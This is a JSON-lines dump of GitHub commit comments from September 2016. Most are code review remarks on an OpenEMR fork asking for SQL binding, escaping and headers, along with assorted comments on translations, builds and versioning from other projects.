{"id":"4545500283","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":18976503,"position":18,"line":11,"path":"frontend.md","commit_id":"2690a79a8576cb11de63db5b766753ae36d6670d","created_at":"2016-09-11T08:59:00Z","updated_at":"2016-09-11T08:59:00Z","body":"    it does provide a basic starting point using [Bootstrap](http://getbootstrap.com) and [Vue](https://vuejs.org) that will be helpful for many applications.\r\n\r\n建议翻译为：\r\n\r\n\r\n    不过默认提供了对大多数应用都很适用的  [Bootstrap](http://getbootstrap.com)  和 [Vue](https://vuejs.org) 来作为起点。\r\n"}},"created_at":"2016-09-11T08:59:00Z"}
{"id":"4545500970","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976505,"position":171,"line":171,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T08:59:35Z","updated_at":"2016-09-11T08:59:35Z","body":"use sql binsing"}},"created_at":"2016-09-11T08:59:35Z"}
{"id":"4545501486","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":18976507,"position":31,"line":22,"path":"frontend.md","commit_id":"2690a79a8576cb11de63db5b766753ae36d6670d","created_at":"2016-09-11T09:00:01Z","updated_at":"2016-09-11T09:00:01Z","body":"把这段英文去掉了。。。"}},"created_at":"2016-09-11T09:00:01Z"}
{"id":"4545501961","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976509,"position":187,"line":187,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:00:17Z","updated_at":"2016-09-11T09:00:17Z","body":"Seems odd that the username and password are hard-coded"}},"created_at":"2016-09-11T09:00:17Z"}
{"id":"4545503080","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976510,"position":246,"line":246,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:01:06Z","updated_at":"2016-09-11T09:01:06Z","body":"above line seems odd"}},"created_at":"2016-09-11T09:01:06Z"}
{"id":"4545503650","type":"CommitCommentEvent","actor":{"login":"moldcraft"},"repo":{"name":"ThemeFuse/Unyson-Builder-Extension"},"payload":{"comment":{"id":18976511,"position":null,"line":null,"path":null,"commit_id":"d74366487f42fcc56bf3342b65470f6eced18a85","created_at":"2016-09-11T09:01:35Z","updated_at":"2016-09-11T09:01:35Z","body":"Make sure Unyson extensions are up-to-date\r\n\r\nIf they are and you still get error, please send your admin/ftp details to `moldcraft(at)email.com`"}},"created_at":"2016-09-11T09:01:35Z"}
{"id":"4545503989","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976512,"position":1,"line":1,"path":"hservice/servicewsdl.xml","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:01:52Z","updated_at":"2016-09-11T09:01:52Z","body":"Need a license/copyright header."}},"created_at":"2016-09-11T09:01:52Z"}
{"id":"4545504196","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18976513,"position":5,"line":22,"path":"FHEM/14_SD_WS.pm","commit_id":"7c15b54258fef1bb0139322c5804e9fccd873c77","created_at":"2016-09-11T09:02:01Z","updated_at":"2016-09-11T09:02:01Z","body":"Ich hatte das \"P\" entfernt da es beim Protocol 9 Probleme gab\r\nhttps://forum.fhem.de/index.php/topic,39451.msg471620.html#msg471620\r\n\r\nIn der SD_WS_Parse ist noch ein Fehler\r\n```\r\n2016.09.11 10:41:21.457 4: sduinoD/msg get raw: MU;P0=660;P1=-980;P2=497;P3=1456;P4=-10500;D=012121212121212131213131313121212121313131213131212131213131313131212131312131313131312131312131313131212121313131313121313121312131213131312131313131212131313121212131313134;CP=2;\r\n2016.09.11 10:41:21.493 4: SD_WS_Parse: Protocol: 9, rawData: FE8789A0C82438254431C0\r\nCan't use an undefined value as a subroutine reference at ./FHEM/14_SD_WS.pm line 172.\r\n```"}},"created_at":"2016-09-11T09:02:01Z"}
{"id":"4545504344","type":"CommitCommentEvent","actor":{"login":"vkuzel"},"repo":{"name":"Recombine/Hibernate-PostgreSQL-Extended-Dialect"},"payload":{"comment":{"id":18976514,"position":null,"line":null,"path":null,"commit_id":"75b5598da5d2dea4d98a6f02e738e8ba08b33da3","created_at":"2016-09-11T09:02:08Z","updated_at":"2016-09-11T09:02:08Z","body":"Hi there. I've seen that you forked my project. I don't know whether you are using it anyway based on my new knowledge I decided to drastically change it.\r\n\r\nTo have support for Java8 time API is not necessary since there is hibernate-java8 library and since Hibernate 5.2 this support is included in hibernate-core. I also decided to switch from dialect to types contributor which I believe is better approach.\r\n\r\nI hope this information was helpful. Have a nice day."}},"created_at":"2016-09-11T09:02:08Z"}
{"id":"4545504498","type":"CommitCommentEvent","actor":{"login":"dailc"},"repo":{"name":"dailc/dailc.github.io"},"payload":{"comment":{"id":18976515,"position":null,"line":null,"path":null,"commit_id":"971f8b29d9f887836d236c893cd8597dacf68337","created_at":"2016-09-11T09:02:14Z","updated_at":"2016-09-11T09:02:14Z","body":"细节"}},"created_at":"2016-09-11T09:02:14Z"}
{"id":"4545504740","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976516,"position":16,"line":16,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:02:25Z","updated_at":"2016-09-11T09:02:25Z","body":"use \\@author tag"}},"created_at":"2016-09-11T09:02:25Z"}
{"id":"4545505826","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976518,"position":19,"line":19,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:03:17Z","updated_at":"2016-09-11T09:03:17Z","body":"Place security flags:\r\n``````\r\n$fake_register_globals=false;\r\n$sanitize_all_escapes=true;"}},"created_at":"2016-09-11T09:03:17Z"}
{"id":"4545506048","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976519,"position":20,"line":20,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:03:28Z","updated_at":"2016-09-11T09:03:28Z","body":"use require_once"}},"created_at":"2016-09-11T09:03:28Z"}
{"id":"4545506750","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":18976521,"position":33,"line":24,"path":"frontend.md","commit_id":"2690a79a8576cb11de63db5b766753ae36d6670d","created_at":"2016-09-11T09:03:48Z","updated_at":"2016-09-11T09:03:48Z","body":" modern JavaScript ==> 你更轻松的开始现代化 JavaScript 编码"}},"created_at":"2016-09-11T09:03:48Z"}
{"id":"4545507719","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976522,"position":30,"line":30,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:04:30Z","updated_at":"2016-09-11T09:04:30Z","body":"Use sqlQuery instead here since just collecting 1 row (then don't need to use sqlFetchArray).\r\nAlso, use sql binding."}},"created_at":"2016-09-11T09:04:30Z"}
{"id":"4545507976","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976523,"position":36,"line":36,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:04:42Z","updated_at":"2016-09-11T09:04:42Z","body":"use sql binding"}},"created_at":"2016-09-11T09:04:42Z"}
{"id":"4545508199","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976524,"position":43,"line":43,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:04:52Z","updated_at":"2016-09-11T09:04:52Z","body":"use sql binding"}},"created_at":"2016-09-11T09:04:52Z"}
{"id":"4545508420","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976525,"position":17,"line":17,"path":"interface/weno/service.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:05:05Z","updated_at":"2016-09-11T09:05:05Z","body":"use @author tag"}},"created_at":"2016-09-11T09:05:05Z"}
{"id":"4545510106","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976527,"position":33,"line":33,"path":"interface/weno/transmit.inc.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:06:29Z","updated_at":"2016-09-11T09:06:29Z","body":"translate this:\r\n``````\r\nreturn xl(\"No Rx Selected\") . \" \";"}},"created_at":"2016-09-11T09:06:29Z"}
{"id":"4545510232","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":18976528,"position":76,"line":56,"path":"frontend.md","commit_id":"2690a79a8576cb11de63db5b766753ae36d6670d","created_at":"2016-09-11T09:06:37Z","updated_at":"2016-09-11T09:06:37Z","body":"-> {tip}  不需要翻译"}},"created_at":"2016-09-11T09:06:37Z"}
{"id":"4545510282","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":18976529,"position":97,"line":73,"path":"frontend.md","commit_id":"2690a79a8576cb11de63db5b766753ae36d6670d","created_at":"2016-09-11T09:06:40Z","updated_at":"2016-09-11T09:06:40Z","body":"-> {tip}  不需要翻译"}},"created_at":"2016-09-11T09:06:40Z"}
{"id":"4545510395","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18976530,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-11T09:06:46Z","updated_at":"2016-09-11T09:06:46Z","body":"The module itself works fine, the rest is like hybrid fiddling with yaml files.\r\nThe progress bar is still rough, perhaps it gets better with Teo's mentioned plans for new python api."}},"created_at":"2016-09-11T09:06:46Z"}
{"id":"4545512390","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976533,"position":3,"line":3,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:08:20Z","updated_at":"2016-09-11T09:08:20Z","body":"don't hard-code the them. use the standard theme line with css_header (see code elsewhere)"}},"created_at":"2016-09-11T09:08:20Z"}
{"id":"4545512540","type":"CommitCommentEvent","actor":{"login":"burak13"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18976534,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-11T09:08:26Z","updated_at":"2016-09-11T09:08:26Z","body":"Congrats! It's worth the wait :)"}},"created_at":"2016-09-11T09:08:26Z"}
{"id":"4545512808","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976535,"position":26,"line":26,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:08:42Z","updated_at":"2016-09-11T09:08:42Z","body":"use @author tag"}},"created_at":"2016-09-11T09:08:42Z"}
{"id":"4545513684","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976537,"position":9,"line":9,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:09:25Z","updated_at":"2016-09-11T09:09:25Z","body":"place this code below the header and below the globals.php include"}},"created_at":"2016-09-11T09:09:25Z"}
{"id":"4545513970","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976538,"position":34,"line":34,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:09:40Z","updated_at":"2016-09-11T09:09:40Z","body":"use require_once on all of the above includes"}},"created_at":"2016-09-11T09:09:40Z"}
{"id":"4545514773","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976539,"position":29,"line":29,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:10:21Z","updated_at":"2016-09-11T09:10:21Z","body":"Place security flags:\r\n``````\r\n$fake_register_globals=false;\r\n$sanitize_all_escapes=true;"}},"created_at":"2016-09-11T09:10:21Z"}
{"id":"4545515813","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976540,"position":40,"line":40,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:11:15Z","updated_at":"2016-09-11T09:11:15Z","body":"this is odd. This should already be set."}},"created_at":"2016-09-11T09:11:15Z"}
{"id":"4545516944","type":"CommitCommentEvent","actor":{"login":"SoltauFintel"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":18976541,"position":null,"line":null,"path":null,"commit_id":"bd75468a089c8ad38bcb1130c4ed7d2703ef85c1","created_at":"2016-09-11T09:12:07Z","updated_at":"2016-09-11T09:12:07Z","body":"Where can I find an example showing how to use CreationTime?"}},"created_at":"2016-09-11T09:12:07Z"}
{"id":"4545517713","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":18976542,"position":26,"line":36,"path":"server/src/database2/ProfileData.java","commit_id":"3848a060bbb57342aaa1ffc9d7d3a60a5e5d69cd","created_at":"2016-09-11T09:12:42Z","updated_at":"2016-09-11T09:12:42Z","body":"*(there's more than two genders)*"}},"created_at":"2016-09-11T09:12:42Z"}
{"id":"4545518998","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976546,"position":64,"line":64,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:13:47Z","updated_at":"2016-09-11T09:13:47Z","body":"use sql binding(note the wildcards go in the binding as below):\r\n``````\r\n$narc = sqlQuery($dea_sql, array('%' . $drugname[0] . '%', '%' . $drugname[0] . '%'));"}},"created_at":"2016-09-11T09:13:47Z"}
{"id":"4545519490","type":"CommitCommentEvent","actor":{"login":"davecheney"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":18976548,"position":null,"line":null,"path":null,"commit_id":"bd75468a089c8ad38bcb1130c4ed7d2703ef85c1","created_at":"2016-09-11T09:14:12Z","updated_at":"2016-09-11T09:14:12Z","body":"We don't the issue tracker to ask questions. Please see https://golang.org/wiki/Questions for good places to ask. Thanks."}},"created_at":"2016-09-11T09:14:12Z"}
{"id":"4545519584","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":18976550,"position":null,"line":null,"path":null,"commit_id":"3848a060bbb57342aaa1ffc9d7d3a60a5e5d69cd","created_at":"2016-09-11T09:14:18Z","updated_at":"2016-09-11T09:14:18Z","body":"Forgetting the `private`s ist not an embarrassing mistake, it's just Java being verbose and stupid. Also, private access should be the default if Java insists on knowing better than the programmer."}},"created_at":"2016-09-11T09:14:18Z"}
{"id":"4545519751","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976551,"position":68,"line":68,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:14:25Z","updated_at":"2016-09-11T09:14:25Z","body":"translate:\r\n``````\r\nxl(\"NONE\")"}},"created_at":"2016-09-11T09:14:25Z"}
{"id":"4545520832","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976553,"position":72,"line":72,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:15:17Z","updated_at":"2016-09-11T09:15:17Z","body":"translate:\r\n``````\r\nprint $list['drug']. \"<font color='red'> \" . xlt(is a controlled substance and cannot be transmitted) . \"</font>\";"}},"created_at":"2016-09-11T09:15:17Z"}
{"id":"4545521465","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976554,"position":77,"line":77,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:15:44Z","updated_at":"2016-09-11T09:15:44Z","body":"use binding"}},"created_at":"2016-09-11T09:15:44Z"}
{"id":"4545521699","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976555,"position":80,"line":80,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:15:54Z","updated_at":"2016-09-11T09:15:54Z","body":"use binding"}},"created_at":"2016-09-11T09:15:54Z"}
{"id":"4545521881","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976556,"position":83,"line":83,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:16:02Z","updated_at":"2016-09-11T09:16:02Z","body":"use binding"}},"created_at":"2016-09-11T09:16:02Z"}
{"id":"4545522998","type":"CommitCommentEvent","actor":{"login":"giacomorebonato"},"repo":{"name":"FormidableLabs/react-music"},"payload":{"comment":{"id":18976558,"position":null,"line":null,"path":null,"commit_id":"54d2978d0beeb07a1a0be312f015242a0ae269c7","created_at":"2016-09-11T09:17:00Z","updated_at":"2016-09-11T09:17:00Z","body":"When is this fix going to be published on NPM ?"}},"created_at":"2016-09-11T09:17:00Z"}
{"id":"4545524330","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976559,"position":86,"line":86,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:18:07Z","updated_at":"2016-09-11T09:18:07Z","body":"Need to translate and make translator friendly(and need to html escape):\r\n``````\r\necho xlt(\"The following drug has been transmitted today\") . \": \" . text($list['drug'])\r\n"}},"created_at":"2016-09-11T09:18:07Z"}
{"id":"4545527191","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976560,"position":291,"line":291,"path":"interface/weno/transmit.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:20:30Z","updated_at":"2016-09-11T09:20:30Z","body":"html escape:\r\n``````\r\necho text($list['drug']) . \"<br> \" . text($weno) . \"<br> \" . text($time[0]) . \"<br> \" . text($time[1]) . \"<br> \" . text($code) . \"<br> \" . text($status);"}},"created_at":"2016-09-11T09:20:30Z"}
{"id":"4545527223","type":"CommitCommentEvent","actor":{"login":"otofune"},"repo":{"name":"sagume/Misskey-Web"},"payload":{"comment":{"id":18976561,"position":null,"line":null,"path":null,"commit_id":"34415f37ff56e88377f4d6a833df7dd5ce05ee4d","created_at":"2016-09-11T09:20:33Z","updated_at":"2016-09-11T09:20:33Z","body":"`req.originalUrl` つかえよオラァン (Express 4のAPIガイドを見つつ)\r\nhttp://expressjs.com/ja/api.html"}},"created_at":"2016-09-11T09:20:33Z"}
{"id":"4545528174","type":"CommitCommentEvent","actor":{"login":"knedlsepp"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976563,"position":null,"line":null,"path":null,"commit_id":"b3d33d398c23295d10cf79448e549a034b6d619e","created_at":"2016-09-11T09:21:21Z","updated_at":"2016-09-11T09:21:21Z","body":"The unsetting of `CXX` breaks the [darwin build](https://github.com/NixOS/nixpkgs/issues/18194). Do you think this is still necessary?"}},"created_at":"2016-09-11T09:21:21Z"}
{"id":"4545528891","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976564,"position":40,"line":242,"path":"templates/prescription/general_list.html","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:21:58Z","updated_at":"2016-09-11T09:21:58Z","body":"What is the 'Date here' string for?"}},"created_at":"2016-09-11T09:21:58Z"}
{"id":"4545529939","type":"CommitCommentEvent","actor":{"login":"kismetgerald"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18976565,"position":null,"line":null,"path":null,"commit_id":"232cc73eb3a483538e3013bfedd2438eca6249ff","created_at":"2016-09-11T09:22:51Z","updated_at":"2016-09-11T09:22:51Z","body":"Line #6 and 21 - check spelling.  I'm sure you probably meant to say \"ldap\" and \"remote\""}},"created_at":"2016-09-11T09:22:51Z"}
{"id":"4545530178","type":"CommitCommentEvent","actor":{"login":"linhphi9x94"},"repo":{"name":"CyanogenMod/android_frameworks_base"},"payload":{"comment":{"id":18976566,"position":4,"line":24,"path":"packages/SystemUI/src/com/android/systemui/statusbar/phone/StatusBarWindowManager.java","commit_id":"bde12ccfb3132a6d75b90f838ca13e6c6b566d7e","created_at":"2016-09-11T09:23:03Z","updated_at":"2016-09-11T09:23:03Z","body":"import cyanogenmod.providers.CMSettings;"}},"created_at":"2016-09-11T09:23:03Z"}
{"id":"4545531165","type":"CommitCommentEvent","actor":{"login":"linhphi9x94"},"repo":{"name":"CyanogenMod/android_frameworks_base"},"payload":{"comment":{"id":18976567,"position":null,"line":null,"path":null,"commit_id":"bde12ccfb3132a6d75b90f838ca13e6c6b566d7e","created_at":"2016-09-11T09:23:55Z","updated_at":"2016-09-11T09:23:55Z","body":"import cyanogenmod.providers.CMSettings;"}},"created_at":"2016-09-11T09:23:55Z"}
{"id":"4545532514","type":"CommitCommentEvent","actor":{"login":"kismetgerald"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18976571,"position":null,"line":null,"path":null,"commit_id":"5658dc27c40125be99e5bbc05103a0b99d21ead7","created_at":"2016-09-11T09:25:00Z","updated_at":"2016-09-11T09:25:00Z","body":"Line #20 - shouldn't Copyright year range be \"2008 - 2016\""}},"created_at":"2016-09-11T09:25:00Z"}
{"id":"4545533479","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976572,"position":1,"line":131,"path":"templates/prescription/general_list.html","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:25:50Z","updated_at":"2016-09-11T09:25:50Z","body":"More thought needs to go into the narcotics and drug_paid data.\r\nTo figure this out, where did you get this data and what format were the data files originally in?"}},"created_at":"2016-09-11T09:25:50Z"}
{"id":"4545534483","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976573,"position":null,"line":null,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T09:26:40Z","updated_at":"2016-09-11T09:26:40Z","body":"Review complete. Looking forward tto the next revision.\r\nI'll see if Scott can look into the Zend issue (if can leverage the Zend library that already exists in OpenEMR)."}},"created_at":"2016-09-11T09:26:40Z"}
{"id":"4545536941","type":"CommitCommentEvent","actor":{"login":"terceranexus6"},"repo":{"name":"terceranexus6/SeteIai"},"payload":{"comment":{"id":18976576,"position":null,"line":null,"path":null,"commit_id":"f4696f0e614c59cc20aa1f027c1eafd7b775a213","created_at":"2016-09-11T09:28:48Z","updated_at":"2016-09-11T09:28:48Z","body":"ahora mismo es constante, pero la idea es cabiarlo, quiero poder editar las descripciones."}},"created_at":"2016-09-11T09:28:48Z"}
{"id":"4545541301","type":"CommitCommentEvent","actor":{"login":"hemanthalluri"},"repo":{"name":"hemanthalluri/hemanthalluri.github.io"},"payload":{"comment":{"id":18976586,"position":null,"line":null,"path":null,"commit_id":"350a10d0f7d1c548b7974144b81b1f1adbd169a8","created_at":"2016-09-11T09:32:23Z","updated_at":"2016-09-11T09:32:23Z","body":"Replace master with page content "}},"created_at":"2016-09-11T09:32:23Z"}
{"id":"4545543526","type":"CommitCommentEvent","actor":{"login":"adapavijay"},"repo":{"name":"adapavijay/repo"},"payload":{"comment":{"id":18976589,"position":1,"line":1,"path":"README.md","commit_id":"0e4ac60b07bad1be06aacd2580fbd76e2589189b","created_at":"2016-09-11T09:34:14Z","updated_at":"2016-09-11T09:34:14Z","body":"commet"}},"created_at":"2016-09-11T09:34:14Z"}
{"id":"4545544962","type":"CommitCommentEvent","actor":{"login":"toddhainsworth"},"repo":{"name":"toddhainsworth/angular-template"},"payload":{"comment":{"id":18976593,"position":null,"line":null,"path":null,"commit_id":"725de6c595500865844f10b19bc6a3226c00a660","created_at":"2016-09-11T09:35:23Z","updated_at":"2016-09-11T09:35:23Z","body":"Resolves: https://github.com/toddhainsworth/angular-template/issues/1"}},"created_at":"2016-09-11T09:35:23Z"}
{"id":"4545546751","type":"CommitCommentEvent","actor":{"login":"luqmankhan0315"},"repo":{"name":"luqmankhan0315/shanii"},"payload":{"comment":{"id":18976596,"position":null,"line":null,"path":null,"commit_id":"41bcfdbf909e79c12d5e11151c78d280c309b56c","created_at":"2016-09-11T09:36:57Z","updated_at":"2016-09-11T09:36:57Z","body":"mera slam"}},"created_at":"2016-09-11T09:36:57Z"}
{"id":"4545551400","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"XPerience-AOSP-Lollipop/android_device_motorola_msm8960dt-common"},"payload":{"comment":{"id":18976603,"position":null,"line":null,"path":null,"commit_id":"655453612b4526954e4fc0b0388ac59a7697b092","created_at":"2016-09-11T09:40:44Z","updated_at":"2016-09-11T09:40:44Z","body":"HardwareAPI.h is no more needed in N as it is already there default in source "}},"created_at":"2016-09-11T09:40:44Z"}
{"id":"4545554096","type":"CommitCommentEvent","actor":{"login":"FGRibreau"},"repo":{"name":"zwb-ict/node-zstd"},"payload":{"comment":{"id":18976606,"position":4,"line":3,"path":"package.json","commit_id":"b105d3c68dbcb426294698023ee0261e3bee79f2","created_at":"2016-09-11T09:43:05Z","updated_at":"2016-09-11T09:43:05Z","body":"@zwb-ict changing the API is a breaking change, it should be 2.0.0. Please follow http://semver.org/ :)"}},"created_at":"2016-09-11T09:43:05Z"}
{"id":"4545554260","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18976607,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-11T09:43:17Z","updated_at":"2016-09-11T09:43:17Z","body":"Here is a log from a base group bootstrap, ie netinstall...\r\n\r\nhttp://pastebin.com/sbCAHpSZ"}},"created_at":"2016-09-11T09:43:17Z"}
{"id":"4545554555","type":"CommitCommentEvent","actor":{"login":"guypod"},"repo":{"name":"igrigorik/ga-beacon"},"payload":{"comment":{"id":18976608,"position":null,"line":null,"path":null,"commit_id":"6acd8627bb7be36f24f5516e9873c92719a50e55","created_at":"2016-09-11T09:43:32Z","updated_at":"2016-09-11T09:43:32Z","body":"I did a bit more digging (was related to how we process badges). It appears you can use a very short expires header too to make most requests get through.\r\n\r\nHowever, you're right that the user identity will be lost. So you can u can get counts (potentially with some inaccuracy for simultaneous visits), but not the rich client info. Still, in some scenarios that's helpful.\r\n\r\nI'll see if I can find the time to submit a PR. Code seems simple, just need to have time to setup an app engine instance and such too.\r\n\r\n"}},"created_at":"2016-09-11T09:43:32Z"}
{"id":"4545555111","type":"CommitCommentEvent","actor":{"login":"fajruddinsk"},"repo":{"name":"mjr27/django-flatpages-tinymce"},"payload":{"comment":{"id":18976609,"position":null,"line":null,"path":null,"commit_id":"4d4cb9f0f684b1ef8f6e5326ef338198e17d3e6d","created_at":"2016-09-11T09:44:04Z","updated_at":"2016-09-11T09:44:04Z","body":"> i love my india\r\n\r\n`def kolkata\r\nreturn 0`\r\n[index.html](url)\r\n"}},"created_at":"2016-09-11T09:44:04Z"}
{"id":"4545556564","type":"CommitCommentEvent","actor":{"login":"quanpengfei"},"repo":{"name":"quanpengfei/hello-world"},"payload":{"comment":{"id":18976612,"position":null,"line":null,"path":null,"commit_id":"085b1096bd2e01fa362e4b5e33532a2515df7902","created_at":"2016-09-11T09:45:22Z","updated_at":"2016-09-11T09:45:22Z","body":"vvvf"}},"created_at":"2016-09-11T09:45:22Z"}
